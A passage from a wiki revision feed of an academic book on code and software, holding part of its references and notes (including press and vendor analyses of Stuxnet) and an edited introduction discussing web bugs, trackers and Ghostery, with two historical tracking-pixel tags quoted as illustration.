Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4710</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4710"/>
		<updated>2012-04-18T14:38:27Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
